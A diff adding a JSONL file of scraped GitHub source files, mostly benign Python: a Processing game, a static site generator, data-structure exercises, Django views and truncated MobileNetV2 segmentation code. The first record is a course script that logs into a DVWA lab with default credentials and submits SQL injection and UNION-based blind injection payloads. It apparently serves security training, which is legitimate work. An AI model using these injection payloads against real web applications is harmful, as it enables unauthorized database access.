diff --git "a/3086.jsonl" "b/3086.jsonl" new file mode 100644--- /dev/null +++ "b/3086.jsonl" @@ -0,0 +1,795 @@ +{"seq_id":"37956016288","text":"import mechanize\nimport datetime\nfrom bs4 import BeautifulSoup\nimport sys\n\nclass DVWA(object):\n LOGIN_FORM = 0\n LOGIN = {'username': 'admin', 'password': 'password'}\n URL = 'http://192.168.1.109/dvwa/index.php'\n SQLi_PAGE = 'http://192.168.1.109/dvwa/vulnerabilities/sqli'\n SECURITY_PAGE = 'http://192.168.1.109/dvwa/security.php'\n SEC_LEVEL = 'low'\n INJECTOR = \"' or ' 1 = 1\"\n BLIND_PAGE = \"http://192.168.1.109/dvwa/vulnerabilities/sqli_blind/\"\n BLIND_INJECTOR = \"1' and 1=0 union select null,table_name from information_schema.tables#\"\n \n def __init__(self):\n self.browser = self._connect()\n self._login()\n \n def security(self):\n self.browser.open(self.SECURITY_PAGE)\n print >> sys.stderr, \"[+] security\"\n print >> sys.stderr, \"\\t{0}\".format(self.browser.title())\n \n self.browser.select_form(nr = 0)\n self.browser.form['security'] = [self.SEC_LEVEL]\n self.browser.submit()\n \n def _login(self):\n self.browser.select_form(nr = self.LOGIN_FORM)\n for k, v in self.LOGIN.iteritems():\n self.browser.form[k] = v\n\n self.browser.submit()\n print >> sys.stderr, \"(+) login\"\n print >> sys.stderr, \"\\t{0}\".format(self.browser.title())\n \n def _connect(self):\n br = mechanize.Browser()\n br.open(self.URL)\n print >> sys.stderr, \"[+] connect\"\n print >> sys.stderr, \"\\t{0}\".format(br.title())\n \n return br\n \n def _dump(self, tags):\n for d in tags:\n print >> sys.stderr, \"\\t{0}\".format(d)\n \n def SQLi(self):\n self.browser.open(self.SQLi_PAGE)\n print >> sys.stderr, \"[+] SQLi\"\n print >> sys.stderr, \"\\t{0} ... injecting \\\"{1}\\\"\".format(self.browser.title(), self.INJECTOR)\n self.browser.select_form(nr = 0)\n self.browser.form['id'] = self.INJECTOR\n self.browser.submit()\n page = self.browser.response().read()\n bs = BeautifulSoup(page, 'lxml')\n all_pre = bs.find_all('pre')\n self._dump(all_pre)\n \n def blind(self):\n self.browser.open(self.BLIND_PAGE)\n print >> sys.stderr, \"[+] blind SQLi\"\n print >> sys.stderr, \"\\t{0} ... injecting \\\"{1}\\\"\".format(self.browser.title(), self.BLIND_INJECTOR)\n self.browser.select_form(nr = 0)\n self.browser.form['id'] = self.BLIND_INJECTOR\n self.browser.submit()\n page = self.browser.response().read()\n bs = BeautifulSoup(page, 'lxml')\n all_pre = bs.find_all('pre')\n self._dump(all_pre)\n\nif __name__ == \"__main__\":\n print >> sys.stderr, \"[+] starting {0} on {1}\".format(sys.argv[0], str(datetime.datetime.now()))\n hackme = DVWA()\n hackme.security()\n hackme.SQLi()\n hackme.blind()\n print >> sys.stderr, \"[+] end on {0}\".format(str(datetime.datetime.now()))","repo_name":"rereidy/SPSE","sub_path":"module 4 - Attacking Web Applications/dvwa-mechanize.py","file_name":"dvwa-mechanize.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"17020730740","text":"player = PVector(60,60)\ns = 30\nspeed = PVector(0,0)\nwc = 54\nwall = []\n\ndef setup():\n global wall\n size(600, 400)\n for i in range(wc):\n wall.append(PVector(s+(s*2+8)*(i%9),\\\n s+(s*2+8)*(i/9)))\n\ndef draw():\n global player,s,speed,wc,wall\n background(255)\n noStroke()\n for i in range(wc):\n fill(255, 0, 0)\n ellipse(wall[i].x, wall[i].y, s, s)\n fill(0)\n ellipse(player.x, player.y, s, s)\n\n if keyPressed:\n if keyCode == UP:\n speed.y -= 0.1\n if keyCode == DOWN:\n speed.y += 0.1\n if keyCode == LEFT:\n speed.x -= 0.1\n if keyCode == RIGHT:\n speed.x += 0.1\n\n speed.x *= 0.98\n speed.y *= 0.98\n player.x += speed.x\n player.y += speed.y\n","repo_name":"codeaid-dev/Processing-Python","sub_path":"Exercise/ExIraira2/ExIraira2.pyde","file_name":"ExIraira2.pyde","file_ext":"pyde","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22195747549","text":"import os\nfrom pprint import pprint\n\nimport jinja2\n\nfrom minimaal import load, parse\nfrom minimaal.load import get_paths_with_ext\nfrom minimaal.config import load_config_file, get_css_paths, build_config, build_config_paths, get_logger\nfrom minimaal.model.post import Post\nfrom minimaal.model.index import Index, make_tag_indices\n\nlog = get_logger()\n\n\ndef build_posts(config, post_paths, jinja_env):\n all_posts = []\n for path in post_paths:\n text = load.read_path_contents(path)\n metadata, content = parse.split_meta_and_content(text)\n post = Post(\n config=config,\n content=content,\n metadata=metadata,\n jinja_env=jinja_env,\n )\n all_posts.append(post)\n return all_posts\n\n\ndef build_index(config, posts, jinja_env):\n index = Index(\n config=config,\n posts=posts,\n jinja_env=jinja_env,\n title='Home',\n )\n return index\n\n\ndef build_tag_indices(config, posts, jinja_env):\n tag_indices = make_tag_indices(\n config=config,\n posts=posts,\n jinja_env=jinja_env,\n )\n return tag_indices\n\n\ndef render(config, items):\n for item in items:\n output_dir = os.path.join(config['paths']['output'], item.directory)\n os.makedirs(output_dir, exist_ok=True)\n output_path = os.path.join(config['paths']['output'], item.path)\n with open(output_path, 'w', encoding='utf-8') as output:\n log.info(\"Writing file to %s\", item.path)\n item.render(output)\n\n\ndef make_config():\n # parser = argparse.ArgumentParser(description='Load some config file for minimaal')\n\n base_path = os.getcwd()\n config_path = os.path.join(base_path, 'config.yaml')\n\n with open(config_path, encoding='utf-8') as config_file:\n user_config = load_config_file(config_file)\n\n config = build_config(user_config)\n config = build_config_paths(config, base_path)\n\n pprint(config)\n\n return config\n\n\ndef make_jinja_env(config):\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(config['paths']['template']))\n css_output_dir = os.path.join(config['paths']['output'], 'static', 'css')\n os.makedirs(css_output_dir, exist_ok=True)\n css = get_css_paths(\n config=config,\n destination=css_output_dir,\n )\n env.globals.update({\n 'css': css,\n 'config': config,\n })\n return env\n\n\ndef main():\n config = make_config()\n jinja_env = make_jinja_env(config)\n post_paths = get_paths_with_ext(\n root=config['paths']['posts'],\n ext=config['md_ext'],\n )\n posts = build_posts(config, post_paths, jinja_env)\n index = build_index(config, posts, jinja_env)\n tag_indices = build_tag_indices(config, posts, jinja_env)\n all_items = posts + tag_indices + [index]\n render(config=config, items=all_items)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"macleodmac/minimaal","sub_path":"minimaal.py","file_name":"minimaal.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34378031142","text":"class Node:\n\n def __init__(self, data=None):\n self.data = data\n self.min = None\n self.next = None\n\n\nclass Stack:\n\n def __init__(self):\n self.head = None\n self.tail = None\n self.size = 0\n\n def isEmpty(self):\n if self.head is None:\n return True\n else:\n return False\n\n def displayTail(self) -> None:\n if self.isEmpty():\n return None\n\n else:\n return self.tail.data\n\n def push(self, val: int) -> None:\n new_node = Node(val)\n\n if (self.isEmpty()):\n self.head = new_node\n self.head.min = self.head.data\n self.size += 1\n self.tail = new_node\n return\n\n # list has one item\n elif self.tail is None:\n self.tail = new_node\n self.head.next = new_node\n self.head.next.min = min(self.head.min, self.head.next.data)\n self.size += 1\n return\n\n # list has multiple items\n else:\n self.tail.next = new_node\n self.tail = new_node\n self.size += 1\n print('added', new_node.data)\n print('size', self.size)\n return\n\n def pop(self) -> None:\n if (self.isEmpty()):\n self.head = None\n return None\n\n # 1 item\n if self.tail is None:\n self.head = None\n self.size -= 1\n\n # 2 items, remove tail\n if self.head.next is self.tail:\n self.tail = None\n self.head.next = None\n self.size -= 1\n\n # multiple items\n prev_node = None\n # Start from head Node\n curr_node = self.head\n # Traverse to the last Node\n while curr_node.next is not None:\n prev_node = curr_node\n curr_node = curr_node.next\n\n self.tail = prev_node\n prev_node.next = None\n self.size -= 1\n\n def popleft(self):\n if self.isEmpty():\n return None\n\n tmp = self.head\n\n self.head = self.head.next\n self.size -= 1\n return tmp\n\n def display(self):\n if self.isEmpty():\n print(\"Stack Underflow\")\n\n else:\n curr_node = self.head\n elements = []\n while curr_node is not None:\n elements.append(curr_node.data)\n curr_node = curr_node.next\n print(elements)\n print(\"size\", self.size)\n\n def top(self) -> int:\n if (self.isEmpty()):\n return None\n else:\n return self.head.data\n\n\nclass MinStack:\n\n def __init__(self):\n self.stack = Stack()\n self.minStack = Stack()\n\n def push(self, val: int) -> None:\n self.stack.push(val)\n\n if self.minStack.isEmpty():\n self.minStack.push(val)\n\n else:\n minStackVal = self.minStack.displayTail()\n self.minStack.push(min(val, minStackVal))\n self.stack.display()\n self.minStack.display()\n\n def pop(self) -> None:\n self.stack.pop()\n self.minStack.pop()\n\n def top(self) -> int:\n return self.stack.top()\n\n def getMin(self) -> int:\n return self.minStack.displayTail()\n\n\nmy_stack = MinStack()\nmy_stack.push(4)\nmy_stack.push(2)\nmy_stack.push(3)\nmy_stack.push(-1)\nmy_stack.push(-2)\nmy_stack.push(5)\nmy_stack.push(-20)\nmy_stack.push(5)\nminVal = my_stack.getMin()\nprint(\"minVal:\", minVal)","repo_name":"nickyiliwang/ds_algo","sub_path":"22.min-stack-scratch.py","file_name":"22.min-stack-scratch.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"6518322456","text":"import requests\n\n\n\n\ndef find_krw_market():\n word_count = 0\n word = []\n word_2 = []\n krw_list = []\n word_2_str =\"\"\n url = \"https://api.upbit.com/v1/market/all\"\n\n querystring = {\"isDetails\":\"false\"}\n\n response = requests.request(\"GET\", url, params=querystring)\n\n coin_list = response.text\n coin_list = coin_list[1:]\n coin_list = coin_list[:-1]\n\n\n for a in coin_list:\n \n if a != \"}\":\n word.append(a)\n else:\n word.append(a)\n word_str = ''.join(word)\n if word_count == 0:\n word_str = word_str[1:]\n else:\n word_str = word_str[2:]\n word_str = word_str[:-1]\n if 'KRW-' in word_str:\n count = 0\n for a in word_str:\n if a == '\"':\n word_2.append(a)\n count += 1\n if count == 4:\n word_2_str= ''.join(word_2)\n break\n else:\n word_2.append(a)\n if \"{\" in word_2_str:\n word_2_str.replace(\"{\",\"\")\n \n \n krw_list.append(word_2_str)\n word = []\n word_2 = []\n word_str = \"\"\n word_2_str = \"\"\n word_count += 1\n del krw_list[0]\n return (krw_list)\n","repo_name":"joontohub/quant_coin","sub_path":"rsi_macd/find_krw.py","file_name":"find_krw.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27356966976","text":"class Solution:\n def rearrangeArray(self, nums: List[int]) -> List[int]:\n pos = []\n neg = []\n \n for i in range(len(nums)):\n if nums[i] > 0:\n pos.append(nums[i])\n else:\n neg.append(nums[i])\n \n res = []\n \n for i in range(len(pos)):\n res.append(pos[i]) \n res.append(neg[i])\n return res","repo_name":"madhvi-n/leetcode-python","sub_path":"2149-rearrange-array-elements-by-sign/2149-rearrange-array-elements-by-sign.py","file_name":"2149-rearrange-array-elements-by-sign.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30874591385","text":"# 11047 동전 0\n\nimport sys\n\nls = []\nn, k = map(int, input().split())\nfor _ in range(n):\n a = int(sys.stdin.readline().strip())\n ls.append(a)\nls.reverse()\n\nresult = 0\nfor i in ls:\n if k // i >= 1:\n result += (k // i)\n k = (k % i)\nprint(result)","repo_name":"Choi-jw-96/Algo-","sub_path":"3Week_free/11047/11047_hyoung.py","file_name":"11047_hyoung.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"28098729176","text":"from django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\nfrom .models import Movie\n# Create your views here.\n\n#view for main page\ndef index(request):\n movie_list = Movie.objects.all()\n paginator = Paginator(movie_list, 10) #pagination on main page\n page = request.GET.get('page')\n try:\n movies = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n movies = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n movies = paginator.page(paginator.num_pages)\n return render(request, 'imdb/index.html', {'movies' : movies})\n\n#view for movie detail page\ndef movie_detail(request, movie_id):\n movie = Movie.objects.get(pk=movie_id)\n return render(request, 'imdb/movies/detail.html', {'movie' : movie})\n\n#view for search results page\ndef search(request):\n if request.method == \"GET\":\n search_term = request.GET['search']\n else:\n search_term = request.POST['search']\n\n movie_list = Movie.objects.filter(name__icontains=search_term) #filtering search request on movie name\n director_list = Movie.objects.filter(director__name__icontains=search_term) #filtering search request on director name\n genre_list = Movie.objects.filter(genres__name__icontains=search_term) #filtering search request on genre name\n final_list = movie_list | director_list | genre_list #appending all the results\n final_list = final_list.distinct();\n\n paginator = Paginator(final_list,10) #pagination on search results page\n page = request.GET.get('page')\n try:\n movies = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n movies = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n movies = paginator.page(paginator.num_pages)\n return render(request, 'imdb/movies/search.html', {'movies' : movies, 'search_term' : search_term})","repo_name":"simrandeep003/IMDB","sub_path":"imdb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24592946243","text":"from makiflow.layers import *\nfrom makiflow.models.segmentation.segmentator import Segmentator\nimport makiflow\n\nimport tensorflow as tf\nimport numpy as np\nimport glob\nimport cv2\nimport seaborn as sns\nfrom tqdm import tqdm\nfrom matplotlib import pyplot as plt\nimport random\nfrom makiflow.models.classificator import Classificator\n\nfrom sklearn.utils import shuffle\nfrom scipy.ndimage import gaussian_filter\nfrom makiflow.metrics import dice_coeff\n\n\nlayer_name = ['input',\n 'Conv/weights',\n 'Conv/BatchNorm',\n 'Conv_relu',\n 'expanded_conv/depthwise/depthwise_weights',\n 'expanded_conv/depthwise/BatchNorm',\n 'expanded_conv/depthsiwe_relu',\n 'expanded_conv/project/weights',\n 'expanded_conv/project/BatchNorm',\n 'expanded_conv_1/expand/weights',\n 'expanded_conv_1/expand/BatchNorm',\n 'expanded_conv_1/expand_relu',\n 'expanded_conv_1/depthwise/depthwise_weights',\n 'expanded_conv_1/depthwise/BatchNorm',\n 'expanded_conv_1/depthsiwe_relu',\n 'expanded_conv_1/project/weights',\n 'expanded_conv_1/project/BatchNorm',\n 'expanded_conv_2/expand/weights',\n 'expanded_conv_2/expand/BatchNorm',\n 'expanded_conv_2/expand_relu',\n 'expanded_conv_2/depthwise/depthwise_weights',\n 'expanded_conv_2/depthwise/BatchNorm',\n 'expanded_conv_2/depthsiwe_relu',\n 'expanded_conv_2/project/weights',\n 'expanded_conv_2/project/BatchNorm',\n 'expanded_conv_2/add',\n 'expanded_conv_3/expand/weights',\n 'expanded_conv_3/expand/BatchNorm',\n 'expanded_conv_3/expand_relu',\n 'expanded_conv_3/depthwise/depthwise_weights',\n 'expanded_conv_3/depthwise/BatchNorm',\n 'expanded_conv_3/depthsiwe_relu',\n 'expanded_conv_3/project/weights',\n 'expanded_conv_3/project/BatchNorm',\n 'expanded_conv_4/expand/weights',\n 'expanded_conv_4/expand/BatchNorm',\n 'expanded_conv_4/expand_relu',\n 'expanded_conv_4/depthwise/depthwise_weights',\n 'expanded_conv_4/depthwise/BatchNorm',\n 'expanded_conv_4/depthsiwe_relu',\n 'expanded_conv_4/project/weights',\n 'expanded_conv_4/project/BatchNorm',\n 'expanded_conv_4/add',\n 'expanded_conv_5/expand/weights',\n 'expanded_conv_5/expand/BatchNorm',\n 'expanded_conv_5/expand_relu',\n 'expanded_conv_5/depthwise/depthwise_weights',\n 'expanded_conv_5/depthwise/BatchNorm',\n 'expanded_conv_5/depthsiwe_relu',\n 'expanded_conv_5/project/weights',\n 'expanded_conv_5/project/BatchNorm',\n 'expanded_conv_5/add',\n 'expanded_conv_6/expand/weights',\n 'expanded_conv_6/expand/BatchNorm',\n 'expanded_conv_6/expand_relu',\n 'expanded_conv_6/depthwise/depthwise_weights',\n 'expanded_conv_6/depthwise/BatchNorm',\n 'expanded_conv_6/depthsiwe_relu',\n 'expanded_conv_6/project/weights',\n 'expanded_conv_6/project/BatchNorm',\n 'expanded_conv_7/expand/weights',\n 'expanded_conv_7/expand/BatchNorm',\n 'expanded_conv_7/expand_relu',\n 'expanded_conv_7/depthwise/depthwise_weights',\n 'expanded_conv_7/depthwise/BatchNorm',\n 'expanded_conv_7/depthsiwe_relu',\n 'expanded_conv_7/project/weights',\n 'expanded_conv_7/project/BatchNorm',\n 'expanded_conv_7/add',\n 'expanded_conv_8/expand/weights',\n 'expanded_conv_8/expand/BatchNorm',\n 'expanded_conv_8/expand_relu',\n 'expanded_conv_8/depthwise/depthwise_weights',\n 'expanded_conv_8/depthwise/BatchNorm',\n 'expanded_conv_8/depthsiwe_relu',\n 'expanded_conv_8/project/weights',\n 'expanded_conv_8/project/BatchNorm',\n 'expanded_conv_8/add',\n 'expanded_conv_9/expand/weights',\n 'expanded_conv_9/expand/BatchNorm',\n 'expanded_conv_9/expand_relu',\n 'expanded_conv_9/depthwise/depthwise_weights',\n 'expanded_conv_9/depthwise/BatchNorm',\n 'expanded_conv_9/depthsiwe_relu',\n 'expanded_conv_9/project/weights',\n 'expanded_conv_9/project/BatchNorm',\n 'expanded_conv_9/add',\n 'expanded_conv_10/expand/weights',\n 'expanded_conv_10/expand/BatchNorm',\n 'expanded_conv_10/expand_relu',\n 'expanded_conv_10/depthwise/depthwise_weights',\n 'expanded_conv_10/depthwise/BatchNorm',\n 'expanded_conv_10/depthsiwe_relu',\n 'expanded_conv_10/project/weights',\n 'expanded_conv_10/project/BatchNorm',\n 'expanded_conv_11/expand/weights',\n 'expanded_conv_11/expand/BatchNorm',\n 'expanded_conv_11/expand_relu',\n 'expanded_conv_11/depthwise/depthwise_weights',\n 'expanded_conv_11/depthwise/BatchNorm',\n 'expanded_conv_11/depthsiwe_relu',\n 'expanded_conv_11/project/weights',\n 'expanded_conv_11/project/BatchNorm',\n 'expanded_conv_11/add',\n 'expanded_conv_12/expand/weights',\n 'expanded_conv_12/expand/BatchNorm',\n 'expanded_conv_12/expand_relu',\n 'expanded_conv_12/depthwise/depthwise_weights',\n 'expanded_conv_12/depthwise/BatchNorm',\n 'expanded_conv_12/depthsiwe_relu',\n 'expanded_conv_12/project/weights',\n 'expanded_conv_12/project/BatchNorm',\n 'expanded_conv_12/add',\n 'expanded_conv_13/expand/weights',\n 'expanded_conv_13/expand/BatchNorm',\n 'expanded_conv_13/expand_relu',\n 'expanded_conv_13/depthwise/depthwise_weights',\n 'expanded_conv_13/depthwise/BatchNorm',\n 'expanded_conv_13/depthsiwe_relu',\n 'expanded_conv_13/project/weights',\n 'expanded_conv_13/project/BatchNorm',\n 'expanded_conv_14/expand/weights',\n 'expanded_conv_14/expand/BatchNorm',\n 'expanded_conv_14/expand_relu',\n 'expanded_conv_14/depthwise/depthwise_weights',\n 'expanded_conv_14/depthwise/BatchNorm',\n 'expanded_conv_14/depthsiwe_relu',\n 'expanded_conv_14/project/weights',\n 'expanded_conv_14/project/BatchNorm',\n 'expanded_conv_14/add',\n 'expanded_conv_15/expand/weights',\n 'expanded_conv_15/expand/BatchNorm',\n 'expanded_conv_15/expand_relu',\n 'expanded_conv_15/depthwise/depthwise_weights',\n 'expanded_conv_15/depthwise/BatchNorm',\n 'expanded_conv_15/depthsiwe_relu',\n 'expanded_conv_15/project/weights',\n 'expanded_conv_15/project/BatchNorm',\n 'expanded_conv_15/add',\n 'expanded_conv_16/expand/weights',\n 'expanded_conv_16/expand/BatchNorm',\n 'expanded_conv_16/expand_relu',\n 'expanded_conv_16/depthwise/depthwise_weights',\n 'expanded_conv_16/depthwise/BatchNorm',\n 'expanded_conv_16/depthsiwe_relu',\n 'expanded_conv_16/project/weights',\n 'expanded_conv_16/project/BatchNorm',\n 'Conv_1/weights',\n 'Conv_1/BatchNorm',\n 'out_relu',\n]\n\n\ndef elastic_transform(image, alpha, sigma, alpha_affine, random_state=None):\n \"\"\"Elastic deformation of images as described in [Simard2003]_ (with modifications).\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n\n Based on https://gist.github.com/erniejunior/601cdf56d2b424757de5\n \"\"\"\n if random_state is None:\n random_state = np.random.RandomState(None)\n\n shape = image.shape\n shape_size = shape[:2]\n\n # Random affine\n center_square = np.float32(shape_size) // 2\n square_size = min(shape_size) // 3\n pts1 = np.float32([center_square + square_size, [center_square[0] + square_size, center_square[1] - square_size],\n center_square - square_size])\n pts2 = pts1 + random_state.uniform(-alpha_affine, alpha_affine, size=pts1.shape).astype(np.float32)\n M = cv2.getAffineTransform(pts1, pts2)\n image = cv2.warpAffine(image, M, shape_size[::-1], borderMode=cv2.BORDER_REFLECT_101,\n flags=cv2.INTER_NEAREST)\n\n # *shape = height, width\n dx = gaussian_filter((random_state.rand(shape_size[0], shape_size[1]) * 2 - 1), sigma, mode='nearest') * alpha\n dy = gaussian_filter((random_state.rand(shape_size[0], shape_size[1]) * 2 - 1), sigma, mode='nearest') * alpha\n\n x, y = np.meshgrid(np.arange(shape[1]), np.arange(shape[0]))\n mapx = np.float32(x + dx)\n mapy = np.float32(y + dy)\n return cv2.remap(image, mapx, mapy, cv2.INTER_NEAREST, borderMode=cv2.BORDER_REFLECT101)\n\n\ndef augment_data(images, masks, num_pos):\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n cols, rows = np.array(images.shape[1:3])\n\n augmented_images = []\n augmented_masks = []\n aug_num_pos = []\n\n for index, (image, mask) in tqdm(enumerate(zip(images, masks))):\n for i in range(3):\n image[:, :, i] = clahe.apply(image[:, :, i])\n \n for i in range(150):\n flip_param = random.randint(-1, 2)\n rotate_param = random.randint(0, 360)\n scale_param = np.random.random() + 1 # [1, 2)\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), rotate_param, scale_param)\n\n if flip_param != 2:\n img_mask = cv2.flip(mask, flip_param)\n img_target = cv2.flip(image, flip_param)\n else:\n img_mask = mask\n img_target = image\n\n img_mask = cv2.warpAffine(img_mask, M, (img_mask.shape[:2]), borderMode=cv2.BORDER_REFLECT101, flags=cv2.INTER_NEAREST)\n img_target = cv2.warpAffine(img_target, M, (img_target.shape[:2]), borderMode=cv2.BORDER_REFLECT101, flags=cv2.INTER_NEAREST)\n\n img_merge = np.concatenate((img_target[...], img_mask[...]), axis=2)\n\n img_merge_p = elastic_transform(img_merge, img_merge.shape[1] * 2, img_merge.shape[1] * 0.1, img_merge.shape[1] * 0.1)\n img_target = img_merge_p[..., :3]\n img_mask = img_merge_p[..., 3:]\n\n augmented_images.append(img_target)\n augmented_masks.append(cv2.cvtColor(img_mask, cv2.COLOR_BGR2GRAY))\n aug_num_pos.append(num_pos[index])\n \n return augmented_images, augmented_masks, aug_num_pos\n\n\ndef load_data(resize_into=256):\n Xtrain = []\n Ytrain = []\n Xtest = []\n Ytest = []\n num_positives = []\n\n path_to_salt = './dataset'\n path_to_images = f'{path_to_salt}/imgs'\n path_to_masks = f'{path_to_salt}/mask'\n imgs = glob.glob(f'{path_to_images}/*')\n masks = glob.glob(f'{path_to_masks}/*')\n last_index = 0\n for i in tqdm(range(len(imgs))):\n mask_name = masks[i]\n img_name = mask_name.replace('mask', 'imgs').replace('_m', '')\n\n img = cv2.imread(img_name)\n img = cv2.resize(img, (resize_into, resize_into), interpolation=cv2.INTER_NEAREST)\n mask = cv2.imread(mask_name)\n mask = cv2.resize(mask, (resize_into, resize_into), interpolation=cv2.INTER_NEAREST)\n\n Xtrain.append(img)\n Ytrain.append(mask)\n\n true_map = np.array(cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)) == 0\n num_positives.append(resize_into*resize_into - true_map.sum())\n\n return np.array(Xtrain, dtype=np.uint8), np.array(Ytrain, dtype=np.uint8) // 10, num_positives\n\n\ndef make_divisible(v, divisor, min_value=None):\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\ndef inverted_res_block(inputs, in_f,out_f, alpha, stride,expansion, block_id):\n global layer_name\n x = inputs\n pointwise_conv_filters = int(out_f*alpha)\n pointwise_f = make_divisible(pointwise_conv_filters,8)\n prefix = 'expanded_conv_{}/'.format(block_id)\n exp_f = expansion * in_f\n if block_id:#check it's zero id or not\n # Expand\n x = ConvLayer(kw=1, \n kh=1,\n in_f=in_f,\n out_f=exp_f, \n name=prefix + 'expand/weights',\n stride=1,\n use_bias=False,\n padding='SAME',\n activation=None)(x)\n\n x = BatchNormLayer(D=exp_f,name=prefix+'expand/BatchNorm')(x)\n\n x = ActivationLayer(activation=tf.nn.relu6,name=prefix+'expand_relu')(x)\n else:\n prefix = 'expanded_conv/'\n\n # Depthwise\n\n x = DepthWiseConvLayer(kw=3,\n kh=3,\n in_f=exp_f,\n multiplier = 1,\n activation=None,\n stride=stride,\n padding='SAME',\n use_bias=False,\n name=prefix + 'depthwise/depthwise_weights')(x)\n\n x = BatchNormLayer(D=exp_f,name=prefix+'depthwise/BatchNorm')(x)\n\n x = ActivationLayer(activation=tf.nn.relu6,name=prefix+'depthsiwe_relu')(x)\n\n # Project\n x = ConvLayer(kw=1,\n kh=1,\n in_f=exp_f,\n out_f=pointwise_f,\n stride=1,\n padding='SAME',\n use_bias=False,\n activation=None,\n name=prefix+'project/weights')(x)\n x = BatchNormLayer(D=pointwise_f,name=prefix+'project/BatchNorm')(x)\n\n\n if stride == 1 and in_f == pointwise_f:\n return SumLayer(name=prefix+'add')([inputs,x]),pointwise_f\n else:\n return x,pointwise_f\n \n\ndef upconv(input_tensor, in_f, out_f, stride, block_id, concat_tensor=None, dilation=1):\n tensor = input_tensor\n if concat_tensor is not None:\n # tensor = UpConvLayer(kh=2, kw=2, in_f=new_in_f, out_f=filters, name=f'UpconvBlock_{block_id}')(tensor)\n tensor = UpSamplingLayer(name=f'UpSampling_{block_id}')(tensor)\n\n # Ugly solution for input shape=(401,401,3)\n # if block_id == 25:\n # tensor = Lambda(lambda x: x[:, :-1, :-1, :])(tensor)\n\n tensor = ConcatLayer(name=f'concat_{block_id}')([tensor, concat_tensor])\n dec_conv, in_new_f = inverted_res_block(tensor, in_f=tensor.get_shape()[-1], out_f=out_f, alpha=1, stride=stride, \n expansion=6, block_id=block_id)\n return dec_conv, in_new_f\n\n\ndef get_MobileNetV2_1_224(picture_size=256 ,batch_size=64, include_top=True, num_classes=10, build_Classificator=False):\n # If build_Classificator is False, method return input as MakiTensor and output as MakiTensor\n # NOTICE checkpoint have \"prediction\" layer at the end for 1001 classes\n alpha = 1\n first_filt = make_divisible(32 * alpha, 8)\n\n in_x = InputLayer(input_shape=[batch_size ,picture_size, picture_size,3],name='input')\n x = ConvLayer(kw=3, kh=3, in_f=3, out_f=first_filt, stride=2, padding='SAME', activation=None, use_bias=False, name='Conv/weights')(in_x)\n\n #128\n x = BatchNormLayer(D=first_filt, name='Conv/BatchNorm')(x)\n x = ActivationLayer(activation=tf.nn.relu6, name='Conv_relu')(x)\n\n enc_1, in_new_f = inverted_res_block(inputs=x, in_f=first_filt, out_f=16, alpha=alpha, stride=1, expansion=1, block_id=0)\n enc_2, in_new_f = inverted_res_block(inputs=enc_1, in_f=in_new_f,out_f=24, alpha=alpha, stride=2, expansion=6, block_id=1)\n #64\n enc_3, in_new_f = inverted_res_block(inputs=enc_2, in_f=in_new_f, out_f=24, alpha=alpha, stride=1, expansion=6,block_id=2)\n enc_4, in_new_f = inverted_res_block(inputs=enc_3, in_f=in_new_f, out_f=32, alpha=alpha, stride=2, expansion=6,block_id=3)\n #32\n enc_5, in_new_f = inverted_res_block(inputs=enc_4, in_f=in_new_f, out_f=32, alpha=alpha, stride=1, expansion=6,block_id=4)\n enc_6, in_new_f = inverted_res_block(inputs=enc_5, in_f=in_new_f, out_f=32, alpha=alpha, stride=1, expansion=6,block_id=5)\n enc_7, in_new_f = inverted_res_block(inputs=enc_6, in_f=in_new_f, out_f=64, alpha=alpha, stride=2, expansion=6,block_id=6)\n #, 16\n enc_8, in_new_f = inverted_res_block(inputs=enc_7, in_f=in_new_f, out_f=64, alpha=alpha, stride=1, expansion=6,block_id=7)\n enc_9, in_new_f = inverted_res_block(inputs=enc_8, in_f=in_new_f, out_f=64, alpha=alpha, stride=1, expansion=6,block_id=8)\n enc_10, in_new_f = inverted_res_block(inputs=enc_9, in_f=in_new_f, out_f=64, alpha=alpha, stride=1, expansion=6,block_id=9)\n enc_11, in_new_f = inverted_res_block(inputs=enc_10, in_f=in_new_f, out_f=96, alpha=alpha, stride=1, expansion=6,block_id=10)\n #, \n enc_12, in_new_f = inverted_res_block(inputs=enc_11, in_f=in_new_f, out_f=96, alpha=alpha, stride=1, expansion=6,block_id=11)\n enc_13, in_new_f = inverted_res_block(inputs=enc_12, in_f=in_new_f, out_f=96, alpha=alpha, stride=1, expansion=6,block_id=12)\n enc_14, in_new_f = inverted_res_block(inputs=enc_13, 